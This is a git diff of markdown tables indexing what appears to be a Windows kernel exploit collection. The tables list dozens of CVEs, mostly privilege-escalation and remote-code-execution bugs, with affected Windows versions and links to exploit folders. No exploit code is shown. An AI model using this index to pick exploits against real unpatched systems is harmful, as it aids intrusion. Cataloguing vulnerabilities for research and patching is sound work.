+| [CVE-2012-0217](./CVE-2012-0217)               |                         Service Bus                          |              Windows 7/2003/2008/Xp              |
+| [CVE-2012-0002](./TestFailure/CVE-2012-0002)   |                   Remote Desktop Protocol                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-2005](./CVE-2011-2005)               |       Ancillary Function Driver Elevation of Privilege       |                 Windows 2003/Xp                  |
+| [CVE-2011-1974](./CVE-2011-1974)               |               NDISTAPI Elevation of Privilege                |                 Windows 2003/Xp                  |
+| [CVE-2011-1249](./CVE-2011-1249)               |       Ancillary Function Driver Elevation of Privilege       |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-0045](./TestFailure/CVE-2011-0045)   |              Windows Kernel Integer Truncation               |                    Windows Xp                    |
+| [CVE-2010-4398](./CVE-2010-4398)               |       Driver Improper Interaction with Windows Kernel        |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-3338](./CVE-2010-3338)               |                        Task Scheduler                        |               Windows 7/2008/Vista               |
+| [CVE-2010-2554](./TestFailure/CVE-2010-2554)   |                   Tracing Registry Key ACL                   |               Windows 7/2008/Vista               |
+| [CVE-2010-1897](./CVE-2010-1897)               |                    Win32k Window Creation                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-0270](./CVE-2010-0270)               |                    SMB Client Transaction                    |                  Windows 7/2008                  |
+| [CVE-2010-0233](./CVE-2010-0233)               |                  Windows Kernel Double Free                  |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2010-0020](./TestFailure/CVE-2010-0020)   |                    SMB Pathname Overflow                     |        Windows 7/2000/2003/2008/Vista/Xp         |
+| [CVE-2009-2532](./CVE-2009-2532)               |                     SMBv2 Command Value                      |                Windows 2008/Vista                |
+| [CVE-2009-0079](./TestFailure/CVE-2009-0079)   |               Windows RPCSS Service Isolation                |                 Windows 2003/Xp                  |
+| [CVE-2008-4250](./CVE-2008-4250)               |                        Server Service                        |            Windows 2000/2003/Vista/Xp            |
+| [CVE-2008-4037](./CVE-2008-4037)               |                  SMB Credential Reflection                   |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2008-3464](./CVE-2008-3464)               |                     AFD Kernel Overwrite                     |                 Windows 2003/Xp                  |
+| [CVE-2008-1084](./CVE-2008-1084)               |                          Win32.sys                           |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2006-3439](./CVE-2006-3439)               |                    Remote Code Execution                     |               Windows 2000/2003/Xp               |
+| [CVE-2005-1983](./TestFailure/CVE-2005-1983)   |                         PnP Service                          |                 Windows 2000/Xp                  |
+| [CVE-2003-0352](./CVE-2003-0352)               |               Buffer Overrun In RPC Interface                |             Windows 2000/2003/Xp/Nt              |
 
 
 
diff --git a/docs/Docs/Home.md b/docs/Docs/Home.md
index 037ef35..a83b0b2 100644
--- a/docs/Docs/Home.md
+++ b/docs/Docs/Home.md
@@ -1,84 +1,85 @@
-| SecurityBulletin                                             |                         Description                          |               OperatingSystem               |
-| :----------------------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: |
-| [CVE-2021-36934](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-36934) |                      Windows Elevation                       |                 Windows 10                  |
-| [CVE-2021-33739](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) |             Microsoft DWM Core Library Elevation             |              Windows 10/Server              |
-| [CVE-2021-26868](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) |             Windows Graphics Component Elevation             |    Windows 8.1/10/2012/2016/2019/Server     |
-| [CVE-2021-1732](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1732) |                        Windows Win32k                        |           Windows 10/2019/Server            |
-| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) |                        Windows Win32k                        | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) |  Windows Kernel Local Elevation of Privilege Vulnerability   | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-16938](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16938) |     Windows Kernel Information Disclosure Vulnerability      |               Windows Server                |
-| [CVE-2020-16898](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16898) |      Windows TCP/IP Remote Code Execution Vulnerability      |           Windows 10/2019/Server            |
-| [CVE-2020-1337](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1337) |               Windows Print Spooler Elevation                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1313](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1313) |        Windows Update Orchestrator Service Elevation         |              Windows 10/Server              |
-| [CVE-2020-1066](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1066) |                   .NET Framework Elevation                   |               Windows 7/2008                |
-| [CVE-2020-1054](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1054) |                Win32k Elevation of Privilege                 | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1015](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1015) |                Windows Elevation of Privilege                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1472](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1472) |               Netlogon Elevation of Privilege                |     Windows 2008/2012/2016/2019/Server      |
-| [CVE-2020-0683](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0683) |           Windows Installer Elevation of Privilege           | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-0796](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0796) |                 SMBv3 Remote Code Execution                  |               Windows Server                |
-| [CVE-2020-0787](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0787) |       Windows Background Intelligent Transfer Service        |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-1458](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1458) |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2019-1388](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1388) |      Windows Certificate Dialog Elevation of Privilege       |       Windows 7/8/2008/2012/2016/2019       |
-| [CVE-2019-0859](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0859) |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-0803](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0803) |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8639](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8639) |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8453](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8453) |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) |             Windows ALPC Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2018-8120](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8120) |                Win32k Elevation of Privilege                 |               Windows 7/2008                |
-| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) |            Windows Kernel Elevation of Privilege             |               Windows 7/2008                |
-| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) |      Windows Subsystem for Linux Elevation of Privilege      |               Windows 10/2016               |
-| [CVE-2018-0833](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0833) |       SMBv3 Null Pointer Dereference Denial of Service       |               Windows 8/2012                |
-| [CVE-2017-8464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-8464) |                  LNK Remote Code Execution                   |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0213](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0213) |              Windows COM Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0143](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0143) |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2017-0101](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0101) |        GDI Palette Objects Local Privilege Escalation        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-7255](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-7255) |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2016-3371](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3371) |            Windows Kernel Elevation of Privilege             |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3309](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3309) |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3225](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3225) |          Windows SMB Server Elevation of Privilege           |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0099](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0099) |                    Secondary Logon Handle                    |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0095](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0095) |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0051](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0051) |                WebDAV Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0041](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0041) |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2546](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2546) |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2387](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2387) |                 ATMFD.DLL Memory Corruption                  |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2015-2370](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2370) |              Windows RPC Elevation of Privilege              |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1725](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1725) |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1701](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1701) |                 Windows Kernel Mode Drivers                  |          Windows 7/2003/2008/Vista          |
-| [CVE-2015-0062](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0062) |        Windows Create Process Elevation of Privilege         |            Windows 7/8/2008/2012            |
-| [CVE-2015-0057](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0057) |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0003](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0003) |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege |         Windows 7/8/2003/2008/2012          |
-| [CVE-2014-6324](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6324) |               Kerberos Checksum Vulnerability                |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-6321](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6321) |           Microsoft Schannel Remote Code Execution           |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4113](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4113) |              Win32k.sys Elevation of Privilege               |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4076](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4076) |                TCP/IP Elevation of Privilege                 |                Windows 2003                 |
-| [CVE-2014-1767](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-1767) |       Ancillary Function Driver Elevation of Privilege       |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2013-5065](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-5065) |                         NDProxy.sys                          |               Windows XP/2003               |
-| [CVE-2013-1345](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1345) |                        Kernel Driver                         |   Windows 7/8/2003/2008/2012/Vista/Rt/Xp    |
-| [CVE-2013-1332](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1332) |        DirectX Graphics Kernel Subsystem Double Fetch        |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2013-0008](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-0008) |               Win32k Improper Message Handling               |       Windows 7/8/2008/2012/Vista/Rt        |
-| [CVE-2012-0217](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0217) |                         Service Bus                          |           Windows 7/2003/2008/Xp            |
-| [CVE-2012-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0002) |                   Remote Desktop Protocol                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-2005](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-2005) |       Ancillary Function Driver Elevation of Privilege       |               Windows 2003/Xp               |
-| [CVE-2011-1974](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1974) |               NDISTAPI Elevation of Privilege                |               Windows 2003/Xp               |
-| [CVE-2011-1249](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1249) |       Ancillary Function Driver Elevation of Privilege       |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-0045](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-0045) |              Windows Kernel Integer Truncation               |                 Windows Xp                  |
-| [CVE-2010-4398](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-4398) |       Driver Improper Interaction with Windows Kernel        |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-3338](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-3338) |                        Task Scheduler                        |            Windows 7/2008/Vista             |
-| [CVE-2010-2554](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-2554) |                   Tracing Registry Key ACL                   |            Windows 7/2008/Vista             |
-| [CVE-2010-1897](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-1897) |                    Win32k Window Creation                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-0270](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0270) |                    SMB Client Transaction                    |               Windows 7/2008                |
-| [CVE-2010-0233](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0233) |                  Windows Kernel Double Free                  |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2010-0020](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0020) |                    SMB Pathname Overflow                     |      Windows 7/2000/2003/2008/Vista/Xp      |
-| [CVE-2009-2532](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-2532) |                     SMBv2 Command Value                      |             Windows 2008/Vista              |
-| [CVE-2009-0079](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2009-0079) |               Windows RPCSS Service Isolation                |               Windows 2003/Xp               |
-| [CVE-2008-4250](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4250) |                        Server Service                        |         Windows 2000/2003/Vista/Xp          |
-| [CVE-2008-4037](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-4037) |                  SMB Credential Reflection                   |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2008-3464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-3464) |                     AFD Kernel Overwrite                     |               Windows 2003/Xp               |
-| [CVE-2008-1084](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2008-1084) |                          Win32.sys                           |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2006-3439](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2006-3439) |                    Remote Code Execution                     |            Windows 2000/2003/Xp             |
-| [CVE-2005-1983](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2005-1983) |                         PnP Service                          |               Windows 2000/Xp               |
-| [CVE-2003-0352](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2003-0352) |               Buffer Overrun In RPC Interface                |           Windows 2000/2003/Xp/Nt           |
+| SecurityBulletin                                             |                         Description                          |                 OperatingSystem                  |
+| :----------------------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: |
+| [CVE-2021-40444](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-40444) |                        Windows IE RCE                        | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server |
+| [CVE-2021-36934](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-36934) |                      Windows Elevation                       |                    Windows 10                    |
+| [CVE-2021-33739](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) |             Microsoft DWM Core Library Elevation             |                Windows 10/Server                 |
+| [CVE-2021-26868](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) |             Windows Graphics Component Elevation             |       Windows 8.1/10/2012/2016/2019/Server       |
+| [CVE-2021-1732](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1732) |                        Windows Win32k                        |              Windows 10/2019/Server              |
+| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) |                        Windows Win32k                        |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) |  Windows Kernel Local Elevation of Privilege Vulnerability   |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-16938](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16938) |     Windows Kernel Information Disclosure Vulnerability      |                  Windows Server                  |
+| [CVE-2020-16898](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16898) |      Windows TCP/IP Remote Code Execution Vulnerability      |              Windows 10/2019/Server              |
+| [CVE-2020-1337](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1337) |               Windows Print Spooler Elevation                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1313](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1313) |        Windows Update Orchestrator Service Elevation         |                Windows 10/Server                 |
+| [CVE-2020-1066](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1066) |                   .NET Framework Elevation                   |                  Windows 7/2008                  |
+| [CVE-2020-1054](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1054) |                Win32k Elevation of Privilege                 |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1015](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1015) |                Windows Elevation of Privilege                |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-1472](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1472) |               Netlogon Elevation of Privilege                |        Windows 2008/2012/2016/2019/Server        |
+| [CVE-2020-0683](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0683) |           Windows Installer Elevation of Privilege           |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-0796](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0796) |                 SMBv3 Remote Code Execution                  |                  Windows Server                  |
+| [CVE-2020-0787](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-0787) |       Windows Background Intelligent Transfer Service        |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-1458](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1458) |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2019-1388](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-1388) |      Windows Certificate Dialog Elevation of Privilege       |         Windows 7/8/2008/2012/2016/2019          |
+| [CVE-2019-0859](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0859) |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2019-0803](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2019-0803) |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8639](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8639) |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8453](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8453) |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016/2019        |
+| [CVE-2018-8440](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8440) |             Windows ALPC Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2018-8120](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-8120) |                Win32k Elevation of Privilege                 |                  Windows 7/2008                  |
+| [CVE-2018-1038](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-1038) |            Windows Kernel Elevation of Privilege             |                  Windows 7/2008                  |
+| [CVE-2018-0743](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0743) |      Windows Subsystem for Linux Elevation of Privilege      |                 Windows 10/2016                  |
+| [CVE-2018-0833](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2018-0833) |       SMBv3 Null Pointer Dereference Denial of Service       |                  Windows 8/2012                  |
+| [CVE-2017-8464](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-8464) |                  LNK Remote Code Execution                   |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0213](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0213) |              Windows COM Elevation of Privilege              |          Windows 7/8/10/2008/2012/2016           |
+| [CVE-2017-0143](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0143) |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2017-0101](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2017-0101) |        GDI Palette Objects Local Privilege Escalation        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-7255](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-7255) |                 Windows Kernel Mode Drivers                  |       Windows 7/8/10/2008/2012/2016/Vista        |
+| [CVE-2016-3371](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3371) |            Windows Kernel Elevation of Privilege             |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3309](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3309) |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-3225](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-3225) |          Windows SMB Server Elevation of Privilege           |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0099](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0099) |                    Secondary Logon Handle                    |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0095](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0095) |                Win32k Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0051](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0051) |                WebDAV Elevation of Privilege                 |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2016-0041](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2016-0041) |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2546](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2546) |       Win32k Memory Corruption Elevation of Privilege        |          Windows 7/8/10/2008/2012/Vista          |
+| [CVE-2015-2387](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2387) |                 ATMFD.DLL Memory Corruption                  |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2015-2370](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-2370) |              Windows RPC Elevation of Privilege              |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1725](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1725) |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2003/2008/2012/Vista        |
+| [CVE-2015-1701](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-1701) |                 Windows Kernel Mode Drivers                  |            Windows 7/2003/2008/Vista             |
+| [CVE-2015-0062](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0062) |        Windows Create Process Elevation of Privilege         |              Windows 7/8/2008/2012               |
+| [CVE-2015-0057](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0057) |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0003](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0003) |                Win32k Elevation of Privilege                 |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2015-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege |            Windows 7/8/2003/2008/2012            |
+| [CVE-2014-6324](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6324) |               Kerberos Checksum Vulnerability                |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-6321](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-6321) |           Microsoft Schannel Remote Code Execution           |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4113](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4113) |              Win32k.sys Elevation of Privilege               |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2014-4076](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-4076) |                TCP/IP Elevation of Privilege                 |                   Windows 2003                   |
+| [CVE-2014-1767](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2014-1767) |       Ancillary Function Driver Elevation of Privilege       |         Windows 7/8/2003/2008/2012/Vista         |
+| [CVE-2013-5065](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-5065) |                         NDProxy.sys                          |                 Windows XP/2003                  |
+| [CVE-2013-1345](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1345) |                        Kernel Driver                         |      Windows 7/8/2003/2008/2012/Vista/Rt/Xp      |
+| [CVE-2013-1332](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-1332) |        DirectX Graphics Kernel Subsystem Double Fetch        |       Windows 7/8/2003/2008/2012/Vista/Rt        |
+| [CVE-2013-0008](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2013-0008) |               Win32k Improper Message Handling               |          Windows 7/8/2008/2012/Vista/Rt          |
+| [CVE-2012-0217](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0217) |                         Service Bus                          |              Windows 7/2003/2008/Xp              |
+| [CVE-2012-0002](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2012-0002) |                   Remote Desktop Protocol                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-2005](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-2005) |       Ancillary Function Driver Elevation of Privilege       |                 Windows 2003/Xp                  |
+| [CVE-2011-1974](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1974) |               NDISTAPI Elevation of Privilege                |                 Windows 2003/Xp                  |
+| [CVE-2011-1249](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-1249) |       Ancillary Function Driver Elevation of Privilege       |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2011-0045](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2011-0045) |              Windows Kernel Integer Truncation               |                    Windows Xp                    |
+| [CVE-2010-4398](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-4398) |       Driver Improper Interaction with Windows Kernel        |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-3338](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-3338) |                        Task Scheduler                        |               Windows 7/2008/Vista               |
+| [CVE-2010-2554](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-2554) |                   Tracing Registry Key ACL                   |               Windows 7/2008/Vista               |
+| [CVE-2010-1897](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-1897) |                    Win32k Window Creation                    |           Windows 7/2003/2008/Vista/Xp           |
+| [CVE-2010-0270](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0270) |                    SMB Client Transaction                    |                  Windows 7/2008                  |
+| [CVE-2010-0233](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0233) |                  Windows Kernel Double Free                  |         Windows 2000/2003/2008/Vista/Xp          |
+| [CVE-2010-0020](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2010-0020) |                    SMB Pathname Overflow                     |        Windows 7/2000/2003/2008/Vista/Xp         |
